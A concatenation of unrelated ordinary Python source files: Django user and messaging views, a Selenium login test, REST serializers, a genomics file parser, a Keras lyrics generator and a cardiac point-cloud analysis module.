# user_info['tags'] = [s.strip() for s in request.POST.get('tags', '').split(',')]
if user_info['email'] != '' and user_info['password'] != '':
# try:
# User.objects.get(email=user_info['email'])
# ret['state_code'] = 10
# except User.DoesNotExist:
u = User.objects.filter(email=user_info['email'])
if not len(u) == 0:
ret['state_code'] = 10
else:
user = User.objects.create_user(
user_info['email'],
user_info['password'],
name = user_info['name']
)
# user.portrait = user_info['portrait']
# user.fix_times = user_info['fix_times']
# user.cellphone = user_info['cellphone']
# user.intro = user_info['intro']
# for s in user_info['tags']:
# if not s == '':
# try:
# tag = Tag.objects.get(name=s)
# except:
# tag = Tag()
# tag.name = s
# tag.save()
# user.tags.add(tag)
user.save()
ret['state_code'] = 0
ret['user_info'] = user_serialize(user)
else:
ret['state_code'] = 9
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
user_login:
user login
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| email | email of user | REQUIRED |
| password | password of user | REQUIRED |
|===================================================================|
returns:
'state_code'
'user_info' -- when (state_code == 0)
'''
@require_http_methods(['POST'])
def user_login(request):
ret = dict()
if request.user.is_authenticated():
ret['state_code'] = 6
ret['user_info'] = user_serialize(request.user)
else:
email = request.POST.get('email', '')
password = request.POST.get('password', '')
user = authenticate(email=email, password=password)
if user is not None:
if user.is_active:
login(request, user)
name = user.name
ret['state_code'] = 0
ret['user_info'] = user_serialize(user)
else:
ret['state_code'] = 7
else:
ret['state_code'] = 8
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
user_logout:
user logout
No params required
returns:
'state_code'
'''
def user_logout(request):
ret = dict()
if not request.user.is_authenticated():
ret['state_code'] = 1
else:
logout(request)
ret['state_code'] = 0
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
get_admin_activity:
get activities that user has admin permission
GET
returns:
'state_code'
'admin_acts' -- when (state_code == 0)
'''
def get_admin_activity(request):
ret = dict()
r = authentication(request,require_authenticate=True)
if not r['state_code'] == 0:
ret['state_code'] = r['state_code']
else:
ret['admin_acts'] = []
for act in request.user.admin_acts.all():
ret['admin_acts'].append(activity_serialize(act))
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
get_admin_activity:
get activities that user joins in.
GET
returns:
'state_code'
'join_acts' -- when (state_code == 0)
'apply_acts_member'
'apply_acts_admin'
'''
def get_join_activity(request):
ret = dict()
r = authentication(request,require_authenticate=True)
if not r['state_code'] == 0:
ret['state_code'] = r['state_code']
else:
ret['join_acts'] = []
ret['apply_acts_member'] = []
ret['apply_acts_admin'] = []
for act in request.user.join_acts.all():
ret['join_acts'].append(activity_serialize(act))
for app in request.user.applications.filter(application_type=1):
ret['apply_acts_member'].append(activity_serialize(app.activity))
for app in request.user.applications.filter(application_type=2):
ret['apply_acts_admin'].append(activity_serialize(app.activity))
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
apply_for_activity:
apply activity permission (member/admin)
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| act_id | id of activity | REQUIRED |
| type | 1 for member / 2 for admin | 1 |
| intro | introduction of user itself | 'no introduction' |
|===================================================================|
returns:
'state_code'
'''
@require_http_methods(['POST'])
def apply_for_activity(request):
ret = dict()
act_id = request.POST.get('act_id')
app_type = request.POST.get('type', 1)
if not request.user.is_authenticated():
ret['state_code'] = 1
elif not act_id:
ret['state_code'] = 51
elif not app_type in ['1', '2']:
ret['state_code'] = 11
else:
act = Activity.objects.filter(id=act_id)
intro = request.POST.get('intro', 'no introduction')
if len(act) == 0:
ret['state_code'] = 51
elif len(act[0].applications.filter(
applicant_id=request.user.id,
application_type=app_type)) > 0:
ret['state_code'] = 53
elif app_type == '1' and len(act[0].members.filter(id=request.user.id)) > 0:
ret['state_code'] = 55
elif app_type == '2' and len(act[0].admins.filter(id=request.user.id)) > 0:
ret['state_code'] = 56
elif app_type == '2' and len(act[0].members.filter(id=request.user.id)) == 0:
ret['state_code'] = 54
else:
app = Application.objects.create(
applicant=request.user,
application_type=app_type,
activity=act[0],
intro=intro
)
app.save()
for admin in act[0].admins.all():
send_message(request.user, admin,
send_application(
request.user.name,
act[0].name,
admin.name,
app_type),
1,
user_id=request.user.id,
act_id=act[0].id)
request.user.save()
ret['state_code'] = 0
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
quit_activity:
Quit activity. User is Deleted from 'applicants', 'admins'
and 'members'. Applications are also deleted.
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| act_id | id of activity | REQUIRED |
|===================================================================|
returns:
'state_code'
'''
@require_http_methods(['POST'])
def quit_activity(request):
ret = dict()
act_id = request.POST.get('act_id')
user = request.user
if not user.is_authenticated():
ret['state_code'] = 1
elif not act_id:
ret['state_code'] = 51
else:
act = Activity.objects.filter(id=act_id)
if len(act) == 0:
ret['state_code'] = 52
else:
act[0].applicants.remove(user)
act[0].admins.remove(user)
act[0].members.remove(user)
act[0].applications.filter(applicant_id=user.id).delete()
ret['state_code'] = 0
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
get_message:
get message list of a user
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| id | id of user | REQUIRED |
| setting | 0: all messages | 0 |
| | 1: all messages sent by user | |
| | 2: all messages sent to user | |
| | 3: all unread messages | |
|===================================================================|
returns:
'state_code'
'messages' -- when (state_code = 0)
'''
@require_http_methods(['POST'])
def get_message(request):
ret = dict()
setting = int(request.POST.get('setting', 0))
r = authentication(request,
required_param=['id'],
require_authenticate=True,
require_model=True,
require_permission=True,
model=User,
keytype='id')
if not r['state_code'] == 0:
ret['state_code'] = r['state_code']
else:
user = r['record']
ret['messages'] = []
ret['state_code'] = 0
if setting == 0:
# for m in user.sent_messages.all():
# ret['messages'].append(message_serialize(m))
# for m in user.messages.all():
# ret['messages'].append(message_serialize(m))
msgs = sorted(user.sent_messages.all() | user.messages.all(), key=lambda x:x.time)
for m in msgs:
ret['messages'].append(message_serialize(m))
elif setting == 1:
for x in user.sent_messages.all():
ret['messages'].append(message_serialize(m))
elif setting == 2:
for m in user.messages.all():
ret['messages'].append(message_serialize(m))
elif setting == 3:
for m in user.messages.filter(read=False):
ret['messages'].append(message_serialize(m))
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
set_message_state:
set message read state
GET param
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| id | id of message | REQUIRED |
| state | state of msg user want to set | REQUIRED |
|===================================================================|
returns:
'state_code'
'''
def set_message_state(request, id, state):
ret = dict()
msg = Message.objects.filter(id=id)
if len(msg) == 0:
ret['state_code'] = 31
else:
msg = msg[0]
if not (request.user.is_admin == True or msg.to_user.id == request.user.id):
ret['state_code'] = 3
else:
if state == '1':
msg.read = True
ret['state_code'] = 0
msg.save()
elif state == '0':
msg.read = False
ret['state_code'] = 0
msg.save()
else:
ret['state_code'] = 32
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
send_message_post:
send message
POST param
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| id | id of user(send to) | REQUIRED |
| content | content of message | REQUIRED |
|===================================================================|
'''
def send_message_post(request):
ret = dict()
r = authentication(request,
required_param=['id','content'],
require_authenticate=True,
require_model=True,
model=User,
keytype='id')
if r['state_code'] == 0:
to_user = r['record']
content = r['params']['content']
send_message(request.user, to_user, content, 0)
ret['state_code'] = 0
else:
ret['state_code'] = r['state_code']
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
follow:
follow another user
POST param
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| id | id of user(to be followed) | REQUIRED |
|===================================================================|
returns:
'state_code'
'''
@require_http_methods(['POST'])
def follow(request):
ret = dict()
r = authentication(request,
required_param=['id'],
require_authenticate=True,
require_model=True,
model=User,
keytype='id')
if not r['state_code'] == 0:
ret['state_code'] = r['state_code']
elif r['record'].id == request.user.id:
ret['state_code'] = 12
else:
r, c = Relationship.objects.get_or_create(
from_user=request.user,
to_user=r['record'])
if not c == True:
ret['state_code'] = 13
else:
update_feature(request.user, r['record'], False)
ret['state_code'] = 0
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
unfollow:
unfollow another user
POST param
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| id | id of user(followed) | REQUIRED |
|===================================================================|
returns:
'state_code'
'''
@require_http_methods(['POST'])
def unfollow(request):
ret = dict()
r = authentication(request,
required_param=['id'],
require_authenticate=True,
require_model=True,
model=User,
keytype='id')
if not r['state_code'] == 0:
ret['state_code'] = r['state_code']
elif r['record'].id == request.user.id:
ret['state_code'] = 12
else:
r = Relationship.objects.filter(
from_user=request.user,
to_user=r['record'])
if len(r) == 0:
ret['state_code'] = 14
else:
r.delete()
ret['state_code'] = 0
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
check_following:
check all following users with their state
no params required
returns:
'state_code'
'following' -- [{'id': id, 'name':name, 'state': state}]
'''
def check_following(request):
ret = dict()
r = authentication(request,
required_param=[],
require_authenticate=True)
if not r['state_code'] == 0:
ret['state_code'] = r['state_code']
else:
ret['following'] = []
for r in request.user.follow.filter(to_people__from_user=request.user):
ret['following'].append(easy_serialize(r))
ret['state_code'] = 0
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
check_follower:
check all follower users
no params required
returns:
'state_code'
'follower' -- [{'id': id, 'name':name}]
'''
def check_follower(request):
ret = dict()
r = authentication(request,
required_param=[],
require_authenticate=True)
if not r['state_code'] == 0:
ret['state_code'] = r['state_code']
else:
ret['follower'] = []
for r in request.user.followed.all():
ret['follower'].append(easy_serialize(r))
ret['state_code'] = 0
return HttpResponse(json.dumps(ret), content_type='application/json')
'''
get_recommend:
get recommend users and activities based on feature
'''
def get_recommend(request):
ret = dict()
r = authentication(request,
required_param=[],
require_authenticate=True)
if not r['state_code'] == 0:
ret['state_code'] = r['state_code']
else:
ret['state_code'] = 0
ret['users'] = []
ret['acts'] = []
users = sorted(User.objects.all(), reverse=True, key=cmp_to_key(compare_construct(request.user)))[0:10]
activities = sorted(Activity.objects.all(), reverse=True, key=cmp_to_key(compare_construct(request.user)))[0:10]
for u in users:
ret['users'].append({'user': serialize(u), 'score': similarity(u.feature, request.user.feature)})
for a in activities:
# ret['acts'].append(serialize(a))
ret['acts'].append({'act': serialize(a), 'score': similarity(a.feature, request.user.feature)})
return HttpResponse(json.dumps(ret), content_type='application/json')
#-------------------------------------------------------------------
def testauthentication(request):
ret = dict()
r = authentication(request,
required_param=['id'],
require_authenticate=True,
require_model=True,
# require_permission=True,
model=Activity,
keytype='id')
if r['state_code']==0:
ret['info'] = activity_serialize(r['record'])
else:
ret['state_code'] = r['state_code']
return HttpResponse(json.dumps(ret), content_type='application/json')
|
# coding: utf8
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import string
import datetime
import allure
import pytest
import requests
import selene
from selene import driver
from selene import tools
from selene.conditions import text, visible
from selene.api import *
import time
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from data import discount_error, discount, paypalLogin, paypalPass, mail, pwd, log_edp_ph, pass_edp, log_edp_ep, \
log_edp_ew, log_edp_pdn, log_edp_mae, log_edp_ee, log_edp_dw
from selenium import webdriver
from General_pages.order_steps import random_mail
from tools import scrollDown
dt = datetime.datetime.now()
dt =dt.strftime("%m/%d/%Y")
dt=str(dt)
@allure.step('Выход из учетной записи')
def logout():
s(by.xpath('//div[@class="hello"]/span')).click()
time.sleep(2)
s(by.xpath('//a[@class="logout"]')).click()
time.sleep(4)
@allure.step('Вход в учетную запись с параметрами')
def login_edp(login,pwd):
s(by.xpath('//a[@href="/login.html"]')).click()
s('#login_login').set_value(login)
s('#login_password').set_value(pwd)
s('.login').click()
@allure.step('Вход в учетную записи для сайта PH')
def login_ph():
s(by.xpath('//a[@href="/login.html"]')).click()
s('#login_login').set_value(log_edp_ph)
s('#login_password').set_value(pass_edp)
s('.login').click()
@allure.step('Вход в учетную записи для сайта EP')
def login_ep():
s(by.xpath('//a[@href="/login.html"]')).click()
s('#login_login').set_value(log_edp_ep)
s('#login_password').set_value(pass_edp)
s('.login').click()
@allure.step('Вход в учетную записи для сайта EW')
def login_ew():
s(by.xpath('//a[@href="/login.html"]')).click()
s('#login_login').set_value(log_edp_ew)
s('#login_password').set_value(pass_edp)
s('.login').click()
@allure.step('Вход в учетную записи для сайта PDN')
def login_pdn():
s(by.xpath('//a[@href="/login.html"]')).click()
s('#login_login').set_value(log_edp_pdn)
s('#login_password').set_value(pass_edp)
s('.login').click()
@allure.step('Вход в учетную записи для сайта DW')
def login_dw():
s(by.xpath('//a[@href="/login.html"]')).click()
s('#login_login').set_value(log_edp_dw)
s('#login_password').set_value(pass_edp)
s('.login').click()
@allure.step('Вход в учетную записи для сайта MAE')
def login_mae():
s(by.xpath('//a[@href="/login.html"]')).click()
s('#login_login').set_value(log_edp_mae)
s('#login_password').set_value(pass_edp)
s('.login').click()
@allure.step('Вход в учетную записи для сайта EE')
def login_ee():
s(by.xpath('//a[@href="/login.html"]')).click()
s('#login_login').set_value(log_edp_ee)
s('#login_password').set_value(pass_edp)
s('.login').click()
@allure.step('Переход во вкладку "Стата"')
def go_to_stata_tab():
s(by.xpath('.//*[@id="header"]/div[2]/div/ul/li[1]/a')).click()
@allure.step('Проверка показателя статы на текущий день')
def check_stata():
time.sleep(5)
scrollDown()
dt = datetime.datetime.now()
dt = dt.strftime("%m/%d/%Y")
dt = str(dt)
print 'Current date is ' + dt
unik_field = s(by.xpath('//div[@class="table-stats-resp-con stats-block"]/div[2]/table[1]/tbody/tr/td[contains(text(), "{0}")]/../td[2]'.format(dt))).text
if unik_field == '1':
print 'Count unik ' + unik_field + " in " + dt
else:
print 'Error unik test ! Unik = ' + unik_field
s('. Error for unik').click()
bid_field = s(by.xpath('//div[@class="table-stats-resp-con stats-block"]/div[2]/table[1]/tbody/tr/td[contains(text(), "{0}")]/../td[3]'.format(dt))).text
if bid_field == '1':
print 'Count bid ' + bid_field + " in " + dt
else:
print 'Error bid test ! Bid = ' + bid_field
s('. Error for unik').click()
#bid = s(by.xpath('//div[@class="table-stats-resp-con stats-block"]/div[2]/table[1]/tbody/tr/td[contains(text(), "{0}")]/../td[3]'.format(dt))).text().assure('0') |
from rest_framework import serializers
from core.models import Employee
from authentication.serializers import UserSerializer
from api.v1.department.serializers import DepartmentSerializer
from api.v1.designation.serializers import DesignationSerializer
from api.v1.ifs.serializers import IfsSerializer
from api.v1.company.serializers import CompanySerializer
from api.v1.level.serializers import LevelSerializer
class EmployeeListSerializer(serializers.ModelSerializer):
user = UserSerializer()
company = CompanySerializer()
ifs = IfsSerializer(required=False)
level = LevelSerializer(required=False)
department = DepartmentSerializer(required=False)
designation = DesignationSerializer(required=False)
class Meta:
model = Employee
fields = '__all__'
class EmployeeCreateSerializer(serializers.ModelSerializer):
user = UserSerializer()
class Meta:
model = Employee
fields = '__all__'
def create(self, validated_data):
user_validated_data = validated_data.pop('user')
user_set_serializer = self.fields['user']
user = user_set_serializer.create(user_validated_data)
employee = Employee.objects.create(user=user, **validated_data)
return employee
class EmployeeUpdateSerializer(serializers.ModelSerializer):
class Meta:
model = Employee
fields = '__all__'
|
import sys
from locus import Locus
from collections import Iterator
import numpy as np
class Pileup_file(Iterator):
"""Class implements an iterator
of pileup file lines. Each line
parsed and returned as a Locus
object."""
def __init__(self, filename=None):
if filename:
self.infile = open(filename, 'r')
else:
self.infile = sys.stdin
def __iter__(self):
#TODO: possibly unpredictable behaviour with stdin
self.infile.seek(0)
return self
def __next__(self):
# returns the next locus
try:
line = self.infile.readline()
line = line.replace('\n','')
line = line.split('\t')
chrom = line[0]
coord = line[1]
ref_base = line[2]
sample_specific_data = line[3:]
except IndexError:
raise StopIteration
return Locus(chrom, coord, ref_base, sample_specific_data)
class Amplification_matrix:
"""Either generates or loads from file
a matrix of probabilities that any allele
will be amplified from any genotype. This
excludes the effect of allelic dropout"""
def __init__(self, filename=None, fp_error=0):
# First two indices are genotype (symmetric), third is intermediate allele
self.matrix = np.zeros((4,4,4))
if filename == None:
for i in range(4):
for j in range(4):
for k in range(4):
if i == j :
self.matrix[i,j,k] = 1 - fp_error if i == k else fp_error/3
else:
self.matrix[i,j,k] = 0.5 - fp_error/3 if i == k or j == k else fp_error/3
else:
#TODO: test this reading ability
f = open(filename, 'r')
for k in range(4):
line = f.readline().split(',')
for col in range(len(line)):
i = np.floor(col/4)
j = col % 4
self.matrix[i,j,k] = line[col]
f.close()
class VCF_file:
#TODO test this unit
""" Reads VCF file. Can be used to read
germline mutations. """
def __init__(self, filename=None):
if filename:
self.infile = open(filename, 'r')
else:
raise Exception("No VCF filename provided")
def __iter__(self):
self.infile.seek(0)
return self
def __next__(self):
# returns the next locus
line = self.infile.readline()
line = line.replace('\n','')
line = line.split('\t')
chrom = line[0]
coord = line[1]
ref_base = line[2]
sample_specific_data = line[3:]
return Locus(chrom, coord, ref_base, sample_specific_data)
|
import csv
from keras import backend as K
from keras.models import load_model
import numpy as np
import os
import sys
# inputs
model_input = sys.argv[1]
n_chars = int(sys.argv[2])
model_dir = sys.argv[3]
charset_file = sys.argv[4]
# to use GPU
os.environ["CUDA_VISIBLE_DEVICES"]="0"
# verify that a gpu is listed
K.tensorflow_backend._get_available_gpus()
# Functions
def deprocessPrediction(ix_to_char, prediction):
index = np.argmax(prediction)
char = ix_to_char[index]
return char
def generateCharacterConverters(chars):
char_to_ix = { ch:i for i,ch in enumerate(sorted(chars)) }
ix_to_char = { i:ch for i,ch in enumerate(sorted(chars)) }
return char_to_ix, ix_to_char
def preprocessInput(char_to_ix, input, n_chars_set):
chars = list(input)
n_sample_chars = len(chars)
preprocessed_input = np.zeros((1, n_sample_chars, n_chars_set), dtype='float32')
for ci, char in enumerate(chars):
index = char_to_ix[char]
preprocessed_input[0][ci][index] = 1
return preprocessed_input
def sample_predictions(preds, temperature=0.5):
# helper function to sample an index from a probability array
preds = np.asarray(preds).astype('float64')
preds = np.log(preds) / temperature
exp_preds = np.exp(preds)
preds = exp_preds / np.sum(exp_preds)
probas = np.random.multinomial(1, preds, 1)
return probas
# Load Data
with open(charset_file, 'r') as csv_file:
reader = csv.reader(csv_file, delimiter=",")
charset = []
for row in reader:
charset.append(row[0])
# Generate Charset Dictionaries
char_to_ix, ix_to_char = generateCharacterConverters(charset)
n_charset = len(charset)
# Load Model
model = load_model(model_dir)
# Generate a sequence from a sequence
# convert input to a sequence of one-hot encoded chars
preprocessed_input = preprocessInput(char_to_ix, model_input, n_charset)
result = model_input
for i in range(n_chars):
prediction = model.predict(preprocessed_input, verbose=0)[0]
sampled_prediction = sample_predictions(prediction)
next_char = deprocessPrediction(ix_to_char, sampled_prediction[0])
preprocessed_input[0][:-1] = preprocessed_input[0][1:]
preprocessed_input[0][-1] = sampled_prediction
result += next_char
sys.stdout.write("\nRAD NEW 90s POP LYRICS")
sys.stdout.write("\n======================")
sys.stdout.write("\n\n")
sys.stdout.write(result)
sys.stdout.write("\n")
sys.stdout.write("\n======================\n") |
import os
class Names:
"""File names saved here with paths"""
def __init__(self):
self.cases_dir = {"Mie02": "./data/zio/Mie_case02_retry_20200516_after_sorting/",
"Mie03": "./data/zio/Mie_case03_WL204_3rd_growing_after_sorting/",
"Mie02_10": "./data/zio/M02_10slices_zio/",
"Mie03_twin": "./data/zio/M03_2020_twins_zio_AS/",
"MI02": "./data/zio/MI02_WL266_ab_AS/"}
self.pressure_file = {"Mie02": "M02_Pressure_100.csv",
"Mie02_10": "M02_Pressure_100.csv",
"Mie03": "M02_Pressure_100.csv"}
self.cases_name_rule = {"Mie02": "Mie_case02_{}.csv",
"Mie03": "MIe_case03_a_{}.csv",
"Mie02_10": "Mie_case02_{}.csv",
"Mie03_twin": "M03_2020_{}.csv",
"MI02": "MI02_WL266_ab_{}.csv"}
self.cases_cardio_circle = {"Mie02": 0.804,
"Mie03": 0.804,
"Mie02_10": 0.804}
self.cases_pressure_dir = {}
self.project_dir = "./unnamed_project/"
try:
os.makedirs(self.project_dir)
except FileExistsError:
pass
self.data_name = ""
self.data = {}
self.movement_data = {}
self.point_number = 0
class DataManager(Names):
def __init__(self):
super().__init__()
pass
def load_data(self, data_name):
import os
import csv
import re
self.data_name = data_name
# load point_cloud data
find_index = re.compile(r"([0-9]+).csv", re.S)
data = os.listdir(self.cases_dir[data_name])
direction = self.cases_dir[data_name]
for item in data:
index = int(re.findall(find_index, item)[0])
self.data[index] = {}
with open(direction + item, "r") as file:
csv_reader = csv.reader(file)
for step, row in enumerate(csv_reader):
if step == 0:
continue
self.data[index][step - 1] = row[2:]
# call load_output to refresh present states
self.load_output()
self.load_point_number()
def load_output(self):
# load output data
self.project_dir = "./" + self.data_name + "/"
try:
os.makedirs(self.project_dir)
except FileExistsError:
pass
files = os.listdir(self.project_dir)
# no data found
if files is None:
pass
# normal load data
else:
for file in files:
self.movement_data[file[:-4]] = self.project_dir + "/" + file
def load_point_number(self):
# load point number
for i in range(1, len(self.data.keys()) + 1):
self.point_number += len(self.data[i][0]) / 3
self.point_number = int(self.point_number)
def show(self, time_index):
import numpy as np
import open3d as o3d
slices = list(self.data.keys())
point_data = []
for i in slices:
data_slice = self.data[i][time_index]
point_number = int(len(data_slice) // 3)
for j in range(point_number):
point_data.append(data_slice[j * 3:j * 3 + 3])
point_cloud = np.array(point_data)
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(point_cloud[:, :3])
o3d.visualization.draw_geometries([pcd])
def create_ply(self, time_index, name="p_mesh_c{}.ply", crop=True):
import numpy as np
import open3d as o3d
try:
os.makedirs("./mesh/" + self.data_name)
except FileExistsError:
pass
slices = list(self.data.keys())
point_data = []
for i in slices:
data_slice = self.data[i][time_index]
point_number = int(len(data_slice) // 3)
for j in range(point_number):
point_data.append(data_slice[j * 3:j * 3 + 3])
point_cloud = np.array(point_data, dtype=np.float32)
point_position = []
for item in point_cloud:
point_position.append(item[:3])
x_, y_, z_ = 0, 0, 0
for item in point_position:
x_ += item[0]
y_ += item[1]
z_ += item[2]
x_ /= point_cloud.shape[0]
y_ /= point_cloud.shape[0]
z_ /= point_cloud.shape[0]
middle = np.array([x_, y_, z_])
normal_vectors = []
for item in point_position:
normal = item - middle
normal_vectors.append(normal)
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(point_cloud[:, :3])
pcd.normals = o3d.utility.Vector3dVector(normal_vectors[:]) # fake normals with low accu
poisson_mesh = \
o3d.geometry.TriangleMesh.create_from_point_cloud_poisson(pcd, depth=8, width=0, scale=1.1,
linear_fit=False)[0]
bbox = pcd.get_axis_aligned_bounding_box()
p_mesh_crop = poisson_mesh.crop(bbox)
if crop is True:
o3d.io.write_triangle_mesh("./mesh/" + self.data_name + "/" + name.format(time_index), p_mesh_crop)
else:
o3d.io.write_triangle_mesh("./mesh/" + self.data_name + "/" + name.format(time_index),
poisson_mesh) # a method not cropping the mesh
# Done
class Analysis(DataManager):
def __init__(self, data_name=None):
super().__init__()
if data_name is None:
print('Try "Analysis(data name)"')
print("Or try '.load_data(data name)'")
else:
self.load_data(data_name)
def show_data(self, datatype):
print("Here is DataManager.Analysis.show_data!")
import Viewer
self.load_output()
try:
data = self.movement_data[datatype]
print(data)
Viewer.plot(data)
except KeyError:
print("File {}.csv not found, unable to process!".format(datatype))
pass
def calculate_data(self, activated=1234567):
print("Here is DataManager.Analysis.calculate_data!")
import preprocess
import starter_forward_difference
file_path = self.cases_dir[self.data_name]
cardio_circle = self.cases_cardio_circle[self.data_name]
output_dir = self.project_dir
name_rule = self.cases_name_rule[self.data_name]
preprocess.preprocess(file_path)
starter_forward_difference.main(file_path, activated, cardio_circle, output_dir, name_rule)
pass
class DeepAnalysis(Analysis):
def __init__(self, data_name=None):
super().__init__(data_name)
self.plot_data = {"time": None,
"slices": [key for key in self.data.keys()],
"type": None}
self.dataset = {"point": None,
"normal": None,
"pressure": None,
"m": None,
"mu": None,
"k": None}
self.full_dataset = {"point": None,
"normal": None,
"pressure": None,
"m": None,
"mu": None,
"k": None,
"data": {}}
self.pressure = {}
self.purified_pressure = {}
self.load_pressure()
self.ode_data_x = []
self.ode_data_y = []
self.ode_data_z = []
self.ode_data_norm = []
self.ode_data_chen = []
def load_pressure(self):
"""load pressure data"""
try:
assert self.data_name != ""
except AssertionError:
print("Failed to init...")
print("Case name is indispensable for DeepAnalysis!")
return
import os
import csvreader
try:
self.cases_pressure_dir[self.data_name] = "./data/pressure/" + self.data_name
os.listdir(self.cases_pressure_dir[self.data_name])
assert os.listdir(self.cases_pressure_dir[self.data_name]) is not []
except FileNotFoundError:
print("Pressure folder not found, generating files...")
csvreader.convert_file(self.data_name, self.pressure_file[self.data_name])
except AssertionError:
print("Pressure folder is empty, generating files...")
csvreader.convert_file(self.data_name, self.pressure_file[self.data_name])
pressure_files = os.listdir(self.cases_pressure_dir[self.data_name])
for pressure_file in pressure_files:
self.pressure[int(float(pressure_file[:-4]) * 100) / 100] = \
self.cases_pressure_dir[self.data_name] + "/" + pressure_file
pass
def purify_pressure(self, time_step=None):
if time_step is None:
time_step = [i for i in range(100)]
import starter
# starter.solve(solver="pressure_purifier.pyw", time_step=time_step,
# case_name=self.data_name, slices=list(self.data.keys()),
# case_dir=self.cases_dir[self.data_name], pressure=self.pressure, background="bear")
starter.solve(solver="distance_clip_pressure_purifier.pyw", time_step=time_step,
case_name=self.data_name, slices=list(self.data.keys()),
case_dir=self.cases_dir[self.data_name], pressure=self.pressure, background="bear")
pass
def advanced_show(self, **kwargs):
"""**kwargs = [time=0, slices=[1,2,3], type=[pressure, m, mu, k,...]]"""
print("Here is DataManager.Analysis.DeepAnalysis.advanced_show!")
import csv
import random
for keyword in kwargs.keys():
self.plot_data[keyword] = kwargs[keyword]
time = "-" + str(self.plot_data["time"]) + "-"
slices = "-" + str(self.plot_data["slices"][0]) + "-" + str(self.plot_data["slices"][-1]) + "-"
type_ = "-"
for i in self.plot_data["type"]:
type_ += str(i)
type_ += "-"
with open(self.project_dir + "time{}_slice{}_type{}.csv".format(time, slices, type_), "w", newline="") as file:
csv_writer = csv.writer(file)
data = []
for item in self.plot_data["slices"]:
raw_points = self.data[item][self.plot_data["time"]]
for i in range(len(raw_points) // 3):
temp = raw_points[i * 3:i * 3 + 3]
temp.append(random.random()) # TODO show specific data, now use random as a test
data.append(temp)
for row in data:
csv_writer.writerow(row)
file.close()
self.show_data("time{}_slice{}_type{}".format(time, slices, type_))
pass
def analysis_ode(self, model="a"):
print("Here is DataManager.Analysis.DeepAnalysis.analysis_ode!")
print("Using model {}".format(model))
self.ode_data_x = []
self.ode_data_y = []
self.ode_data_z = []
self.ode_data_norm = []
self.ode_data_chen = []
t = 0.01
import numpy as np
import os
import csv
for file in os.listdir("./data/pressure/" + self.data_name + "_purified/"):
self.purified_pressure[float(file[:-4])] = "./data/pressure/" + self.data_name + "_purified/" + file
data_index = list(self.purified_pressure.keys())
data_index.sort()
for step in range(len(data_index)):
data = []
with open(self.purified_pressure[data_index[step]], "r") as f:
csv_reader = csv.reader(f)
for row in csv_reader:
data.append(row)
f.close()
self.full_dataset["data"][step] = np.array(data, dtype=np.float32)
def save_data(ode_data, name):
import csv
base_data = self.full_dataset["data"][0][:, :3]
with open("./" + self.data_name + "/{}.csv".format(name), "w", newline="") as f:
csv_writer = csv.writer(f)
for row_ in zip(base_data, ode_data):
row_ = [float(item) for sublist in row_ for item in sublist]
csv_writer.writerow(row_)
f.close()
if model == "a":
for index in range(self.point_number - 100):
Ax = np.zeros([98, 1])
Bx = np.zeros([98, 1])
Ay = np.zeros([98, 1])
By = np.zeros([98, 1])
Az = np.zeros([98, 1])
Bz = np.zeros([98, 1])
A = np.zeros([98, 1])
B = np.zeros([98, 1])
for time_step in range(len(self.purified_pressure.keys()) - 2):
point_cloud1 = self.full_dataset["data"][time_step][index, :3]
point_cloud2 = self.full_dataset["data"][time_step + 1][index, :3]
point_cloud3 = self.full_dataset["data"][time_step + 2][index, :3]
pressure = self.full_dataset["data"][time_step + 1][index, 3] * 0.0001
normal = self.full_dataset["data"][time_step + 1][index, 4:]
# pressure assert to have same direction with a
dx1 = point_cloud2 - point_cloud1
dx2 = point_cloud3 - point_cloud2
dx = 0.5 * (dx1 + dx2)
v = dx / t
a_ = (dx2 - dx1) / t ** 2
Ax[time_step, 0] = abs(a_[0])
Bx[time_step] = abs(pressure * normal[0])
Ay[time_step, 0] = abs(a_[1])
By[time_step] = abs(pressure * normal[1])
Az[time_step, 0] = abs(a_[2])
Bz[time_step] = abs(pressure * normal[2])
A[time_step, 0] = np.linalg.norm(a_) * 1
B[time_step] = np.linalg.norm(pressure * normal @ (a_ / np.linalg.norm(a_)))
# A[time_step, 1] = np.linalg.norm(v) * ((a_ / np.linalg.norm(a_)) @ (v / np.linalg.norm(v)))
# A[time_step, 2] = np.linalg.norm(dx) * ((a_ / np.linalg.norm(a_)) @ (dx / np.linalg.norm(dx)))
ans_x = np.linalg.solve(Ax.T @ Ax, Ax.T @ Bx)
self.ode_data_x.append([float(ans_x[0])]) # , float(ans_x[1])])
ans_y = np.linalg.solve(Ay.T @ Ay, Ay.T @ By)
self.ode_data_y.append([float(ans_y[0])]) # , float(ans_y[1])])
ans_z = np.linalg.solve(Az.T @ Az, Az.T @ Bz)
self.ode_data_z.append([float(ans_z[0])]) # , float(ans_z[1])])
self.ode_data_norm.append([np.sqrt(
ans_x[0] ** 2 + ans_y[0] ** 2 + ans_z[0] ** 2)]) # , np.sqrt(ans_x[1]**2+ans_y[1]**2+ans_z[1]**2)])
ans_chen = np.linalg.solve(A.T @ A, A.T @ B)
self.ode_data_chen.append([float(ans_chen[0])])
save_data(self.ode_data_x, "m-x")
save_data(self.ode_data_y, "m-y")
save_data(self.ode_data_z, "m-z")
